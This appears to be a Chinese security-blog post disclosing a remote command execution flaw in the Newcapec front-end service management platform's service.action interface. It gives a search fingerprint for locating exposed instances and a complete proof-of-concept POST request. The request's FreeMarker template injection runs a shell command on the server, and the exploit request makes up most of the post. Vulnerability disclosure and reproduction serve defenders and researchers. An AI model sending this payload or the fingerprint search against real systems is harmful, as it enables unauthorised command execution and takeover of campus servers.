Newcapec 前置服务管理平台 service.action 远程命令执行漏洞
# Newcapec 前置服务管理平台 service.action 远程命令执行漏洞
## 漏洞描述
Newcapec 前置服务管理平台 service.action 接口存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限...
Newcapec 前置服务管理平台 service.action 远程命令执行漏洞
漏洞描述
Newcapec 前置服务管理平台 service.action 接口存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限
漏洞影响
Newcapec 前置服务管理平台
网络测绘
title="掌上校园服务管理平台"
漏洞复现
登陆页面
验证POC
POST /service_transport/service.action HTTP/1.1
Host:
Accept: */*
Content-Type: application/json
{"command":"GetFZinfo","UnitCode":"<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo Test > ./webapps/ROOT/Test.txt\")}"}
- 发表于 2024-07-12 18:46:31
- 阅读 ( 2195 )
- 分类:Web应用
带头大哥
456 篇文章